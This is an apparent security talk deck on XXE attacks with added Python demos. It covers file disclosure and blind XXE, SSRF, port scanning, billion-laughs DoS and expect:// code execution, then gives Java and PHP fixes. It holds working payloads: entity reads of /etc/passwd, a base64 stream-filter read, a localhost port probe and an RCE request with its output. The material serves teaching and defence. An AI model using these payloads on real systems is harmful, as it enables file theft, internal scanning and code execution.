XML eXternal Entity Attack (XXE) and other related attacks
By: Samit Anwer
samit.anwer@gmail.com
Agenda
• Document Type Definition
• Prerequisites to perform an XXE attack
• Outcomes
• Fixing XXE vulnerabilities
Document Type Definition (DTD)
A DTD defines the structure of an XML document: its legal elements, attributes and entities.
A DTD can be internal (declared inline inside the DOCTYPE, as in the example below) or external (a separate file named by a SYSTEM or PUBLIC identifier in the DOCTYPE).
Why External Entities?
• Common references shared between multiple XML documents: an external entity names a resource by URI, and the parser fetches that resource and substitutes its content wherever the entity is referenced
<?xml version="1.0" standalone="no" ?>
<!DOCTYPE copyright [ <!ELEMENT copyright (#PCDATA)> <!ENTITY c SYSTEM "http://www.xmlwriter.net/copyright.xml"> ]>
<copyright>&c;</copyright>
• Security issues arise because the parser dereferences whatever the system identifier names. PHP (libxml) places no restrictions on what URLs can be accessed here, even if allow_url_fopen is set to false in php.ini
Prerequisites to perform an XXE
• The application parses XML documents
• Tainted (attacker-controlled) data can reach the system identifier of an entity declared in the DTD
• The XML processor is configured to process the DTD (validation is not required: a non-validating parser that substitutes entities is enough)
• The XML processor is configured to resolve external entities declared in the DTD
Outcomes
• Disclosure of confidential data / file inclusion
• Server Side Request Forgery (SSRF)
• Port Scanning
• DoS on the parsing system
• Remote Code Execution
File inclusion
• The entity's replacement text is parsed as XML, so the local file must be well-formed XML (no unescaped < or &, no characters the parser rejects); otherwise the parse fails and nothing comes back
• What if it is not?
• Wrap the read in a PHP stream filter that Base64-encodes the bytes: the encoded text is always well-formed, so binary or otherwise unparseable files can be read too
• What if the confidential file is not reflected in the response?
• Blind XXE: the parser still fetches the resource, so the content has to be taken out-of-band (for example by making the parser request a URL on a host the attacker controls) or inferred from error messages and timing
<!DOCTYPE scan [<!ENTITY test SYSTEM "file:///etc/passwd">]>
<scan>&test;</scan>
<!DOCTYPE scan [<!ENTITY test SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">]>
<scan>&test;</scan>
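The file-disclosure payload above, run against a real parser, as an added example that is not part of the original deck: Python's standard-library SAX parser (backed by expat) with external general entities switched on, then with the two parser-level fixes. The secret file, its contents, the file names and the entity name are constructed for the demo; nothing here reads /etc/passwd.

```python
"""Added example, not from the slides: the file-disclosure payload against
Python's stdlib SAX parser (expat), once with external general entities
enabled and once with the two parser-level fixes.

Everything is constructed inline: the "passwd" file stands in for
/etc/passwd, and the file names and entity name are assumptions.
"""
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges, property_lexical_handler


class DoctypeForbidden(Exception):
    """Raised when untrusted input carries a DOCTYPE and we refuse to continue."""


class _RejectDoctype:
    """Lexical handler whose only job is to abort on <!DOCTYPE ...>.

    Same idea as Xerces' disallow-doctype-decl=true: no DTD means no
    entity declarations, so no external entities and no entity-expansion DoS.
    """
    def startDTD(self, name, public_id, system_id):
        raise DoctypeForbidden(f"DOCTYPE {name!r} is not allowed in untrusted XML")

    def endDTD(self): pass
    def startCDATA(self): pass
    def endCDATA(self): pass
    def comment(self, text): pass


class _TextCollector(ContentHandler):
    """Collects the character data the application would echo back."""
    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)


def parse_untrusted(xml_bytes, *, resolve_external, allow_doctype=True):
    """Parse attacker-controlled XML and return its text content."""
    parser = xml.sax.make_parser()
    # VULNERABLE when True: expat dereferences each general entity's SYSTEM id
    # (file://, http://, ...) and splices the fetched bytes into the document.
    # Python < 3.7.1 defaulted to True; set it explicitly either way.
    parser.setFeature(feature_external_ges, resolve_external)
    if not allow_doctype:
        parser.setProperty(property_lexical_handler, _RejectDoctype())
    collector = _TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(collector.parts)


def xxe_payload(target_url):
    """Same shape as the slide's payload, with the target URL swapped in."""
    return (f'<!DOCTYPE scan [<!ENTITY test SYSTEM "{target_url}">]>'
            f'<scan>&test;</scan>').encode()


def read_via_xxe(path, *, resolve_external=True, allow_doctype=True):
    """The leaked file content, or None if the parser choked on it."""
    try:
        return parse_untrusted(xxe_payload("file://" + path),
                               resolve_external=resolve_external,
                               allow_doctype=allow_doctype)
    except xml.sax.SAXParseException:
        return None


def demo():
    """Run the payload under each parser configuration; returns the outcomes."""
    with tempfile.TemporaryDirectory() as d:
        passwd = os.path.join(d, "passwd")      # constructed stand-in for /etc/passwd
        with open(passwd, "w") as f:
            f.write("root:x:0:0:root:/root:/bin/bash\n")
        config = os.path.join(d, "app.ini")     # a bare '<' makes it non-well-formed XML
        with open(config, "w") as f:
            f.write("db_pass = a < b & c\n")
        results = {
            "vulnerable": read_via_xxe(passwd),
            # Entity text must be well-formed XML, otherwise the parse fails
            # (hence the php://filter base64 trick on the slide).
            "not_wellformed": read_via_xxe(config),
            # Fix 1: external general entities off -> the entity expands to nothing.
            "no_external_ges": read_via_xxe(passwd, resolve_external=False),
        }
        try:
            read_via_xxe(passwd, allow_doctype=False)
            results["no_doctype"] = "parsed"
        except DoctypeForbidden:
            results["no_doctype"] = "rejected"  # Fix 2: DOCTYPE refused outright
    return results


if __name__ == "__main__":
    for case, outcome in demo().items():
        print(f"{case:16} -> {outcome!r}")
```

Run it and the vulnerable case returns the stand-in passwd line; the file with a bare < fails exactly as the slide warns, which is why the Base64 stream filter exists; with feature_external_ges off the entity resolves to nothing; with the DOCTYPE rejected the parse never reaches the entity at all. Of the two fixes, rejecting DOCTYPE is the one to ship: the feature flag alone still leaves internal-entity DoS open.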
SSRF
• Because the entity's system identifier can be any URL, the attacker can make the vulnerable server issue requests on their behalf: to hosts on the internal network that are unreachable from outside, from the server's own network position
Port Scanning
• The system identifier can name any host and port, so the XML parser will open a TCP connection to whatever you specify
• As long as PHP error messages are enabled, the warning echoes the first line the service sent back, so you get the banner of the service running even if the port doesn't speak HTTP
• What if error messages are disabled? Time is your friend: a closed port is refused immediately, an open port takes measurably longer to fail (or succeeds), and a filtered port hangs until the timeout
<!DOCTYPE scan [<!ENTITY test SYSTEM "http://localhost:22">]>
<scan>&test;</scan>
Warning: simplexml_load_string(http://localhost:22): failed to open stream: HTTP request failed! SSH-2.0-OpenSSH_5.5p1 Debian-4ubuntu5 in testxml.php on line 10
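The SSRF and port-scanning slides above describe what the parser's entity resolver does with a SYSTEM identifier. The following is an added example, not code from the deck, that reproduces it offline with Python's standard library: two constructed one-shot services on 127.0.0.1 stand in for an internal HTTP host and for sshd (its banner text is made up to match the slide's warning), a third target is a port nobody listens on, and an expat parser with a permissive ExternalEntityRefHandler drives the probing. The loopback addresses, ports and the /internal/ path are assumptions.

```python
"""Added example, not from the slides: what a permissive entity resolver
does with a SYSTEM identifier, and why that makes the parser a port scanner.

Two constructed one-shot services on 127.0.0.1 stand in for an internal
network: one answers HTTP, one greets with a non-HTTP banner the way sshd
does (the banner is made up to mirror the slide). A third target is a port
nothing listens on.
"""
import http.client
import socket
import threading
import urllib.error
import urllib.request
import xml.parsers.expat

BANNER = b"SSH-2.0-OpenSSH_5.5p1 Debian-4ubuntu5\r\n"   # constructed
_BODY = b"<internal>ok</internal>"
HTTP_REPLY = b"HTTP/1.0 200 OK\r\nContent-Length: %d\r\n\r\n" % len(_BODY) + _BODY


def serve_once(reply: bytes) -> int:
    """Listen on a free loopback port; on the first connection send `reply` and hang up."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]

    def run():
        conn, _ = srv.accept()
        conn.recv(4096)          # whatever the resolver sent (an HTTP request)
        conn.sendall(reply)
        conn.close()
        srv.close()

    threading.Thread(target=run, daemon=True).start()
    return port


def closed_port() -> int:
    """A loopback port that was free a moment ago (good enough for a demo)."""
    s = socket.socket()
    s.bind(("127.0.0.1", 0))
    port = s.getsockname()[1]
    s.close()
    return port


# No proxy: the resolver must talk to the target directly, as the parser would.
_opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))


def resolve_like_a_parser(system_id: str, timeout: float = 3.0) -> str:
    """What a permissive resolver does with a SYSTEM id: just open it.
    The outcome (body, banner, refusal or timeout) is the scan result."""
    try:
        with _opener.open(system_id, timeout=timeout) as resp:
            return "open:http " + resp.read().decode()
    except http.client.BadStatusLine as e:
        # Something answered, but not in HTTP: its first line is the banner.
        # This is the text that leaked into PHP's warning on the slide.
        return "open:banner " + e.line.strip()
    except urllib.error.URLError as e:
        if isinstance(e.reason, ConnectionRefusedError):
            return "closed"                              # RST came back at once
        return "filtered-or-error " + str(e.reason)      # timeouts: time is your friend


def scan_via_xxe(targets):
    """Feed one XXE document per target; the resolver callback does the probing.
    Returns {system_id: outcome} in the order the parser resolved them."""
    seen = {}

    def on_external_entity(context, base, system_id, public_id):
        seen[system_id] = resolve_like_a_parser(system_id)
        return 1   # tell expat the entity was handled (we give it no content)

    for target in targets:
        parser = xml.parsers.expat.ParserCreate()
        parser.ExternalEntityRefHandler = on_external_entity
        parser.Parse(f'<!DOCTYPE scan [<!ENTITY test SYSTEM "{target}">]>'
                     f'<scan>&test;</scan>', True)
    return seen


def demo():
    targets = [
        f"http://127.0.0.1:{serve_once(BANNER)}",              # 'port 22' on the slide
        f"http://127.0.0.1:{serve_once(HTTP_REPLY)}/internal/",
        f"http://127.0.0.1:{closed_port()}",
    ]
    return scan_via_xxe(targets)


if __name__ == "__main__":
    for target, outcome in demo().items():
        print(f"{target:40} {outcome}")
```

The three outcomes are exactly the three signals the slide relies on: a body when the port speaks HTTP, the service banner when it does not, and an immediate refusal when nothing listens. A timeout (the fourth branch) is what a filtered port looks like, which is where timing takes over once error messages are off.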
DoS
• Billion laughs attack: a handful of nested internal entity declarations, each referencing the previous one ten times, expands to 10^9 copies of a short string and exhausts the parser's memory
• Try opening file:///dev/random: the file never reaches end-of-file, so the parser keeps reading (and, on older kernels, blocks waiting for entropy) until something kills it
https://en.wikipedia.org/wiki/Billion_laughs
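An added example (not from the deck) of the amplification behind the billion laughs attack, using Python's standard-library ElementTree parser: the payload shape is the classic lol0..lolN chain, shrunk to a depth and width that finish instantly. Entity names and the seed string are arbitrary choices for the demo.

```python
"""Added example, not from the slides: how entity expansion turns a few
hundred bytes of input into arbitrarily large output. Depth and width are
kept tiny so it runs instantly; the real attack uses depth 9, width 10
(a billion copies). Built with the stdlib ElementTree parser (expat).
"""
import xml.etree.ElementTree as ET


def nested_entities(depth, width, seed="lol"):
    """Build a 'lol' payload: lol1 = width x lol0, lol2 = width x lol1, ..."""
    decls = [f'<!ENTITY lol0 "{seed}">']
    for i in range(1, depth + 1):
        decls.append(f'<!ENTITY lol{i} "' + f"&lol{i - 1};" * width + '">')
    return f'<!DOCTYPE lolz [{"".join(decls)}]><lolz>&lol{depth};</lolz>'


def expanded_size(payload):
    """Characters of text the parser produces for the root element."""
    return len(ET.fromstring(payload).text or "")


def amplification(depth, width):
    """(input bytes, output bytes) for the given shape; output grows as width**depth."""
    payload = nested_entities(depth, width)
    return len(payload), expanded_size(payload)


if __name__ == "__main__":
    for depth in range(1, 5):
        n_in, n_out = amplification(depth, 10)
        print(f"depth={depth}: {n_in} bytes in -> {n_out} bytes out ({n_out // n_in}x)")
```

Depth 9 with width 10 is the real payload: the same 3-byte seed a billion times over from a document smaller than 1 KB. Recent expat (2.4+) and libxml2 releases cap entity amplification, but a parser that rejects DOCTYPE outright never has to count.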
Remote Code Execution
• Needs the PHP expect extension (a PECL module, not part of a default PHP install): its expect:// stream wrapper runs a command and exposes its output as a stream, so a SYSTEM identifier of expect://id executes id on the server
Request:
<!DOCTYPE root [<!ENTITY foo SYSTEM "expect://id">]>
<methodCall>
<methodName>&foo;</methodName>
</methodCall>
Response (the XML-RPC endpoint echoes the unknown method name, which is now the command output):
<?xml version="1.0" encoding="UTF-8"?>
<methodResponse>
<fault><value><struct><member><name>faultCode</name><value><int>620</int></value></member><member><name>faultString</name><value>
<string>Method &quot;uid=33(www-data) gid=33(www-data) groups=33(www-data)
&quot; does not exist</string>
</value></member></struct></value></fault></methodResponse>
Fixes – JAVA
• Disable DTDs
• If it is not possible to disable DTDs completely, then
• Disable external entities (general and parameter)
• Disable external DTDs
DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
// Strongest fix: reject any DOCTYPE (also stops entity-expansion DoS); the remaining features only matter if DTDs must stay enabled
factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
Fixes - PHP
• libxml_disable_entity_loader(true); before parsing, on PHP 5.2.11 through 7.x
• On PHP 8.0 and later (libxml 2.9+) external entity loading is off by default and libxml_disable_entity_loader() is deprecated; the remaining trap is passing LIBXML_NOENT (or validating against the DTD) to simplexml_load_string(), DOMDocument::loadXML() and friends, which turns it back on for untrusted input
• Refer - https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Prevention_Cheat_Sheet#PHP
Fixes – iOS, .NET, C/C++
• Covered by the language-specific sections of the same OWASP prevention cheat sheet
References
• DTD tutorial
http://edutechwiki.unige.ch/en/DTD_tutorial
• XML External Entity (XXE) Processing
https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing
• XML External Entity (XXE) Prevention Cheat Sheet
https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Prevention_Cheat_Sheet#PHP
• Identifying XML eXternal Entity vulnerability (XXE)
http://blog.h3xstream.com/2014/06/identifying-xml-external-entity.html
• Scanning the internal network using SimpleXML
https://www.idontplaydarts.com/2011/02/scanning-the-internal-network-using-simplexml/
Thank You!
Q/A?

Source deck: XML External Entity Null Meet 19_3_16.pptx


Editor's Notes

1. An XML External Entity attack is an attack against an application that parses XML input. It occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser.
2. The system identifier is assumed to be a URI that the XML processor dereferences when processing the entity; the processor then replaces each occurrence of the named external entity with the content it fetched. If the system identifier contains tainted data and the processor dereferences it, the processor may disclose confidential information.
3. The expect extension lets PHP interact with processes through a PTY (the expect:// wrapper on the Remote Code Execution slide); it is a PECL extension and not part of a default PHP install.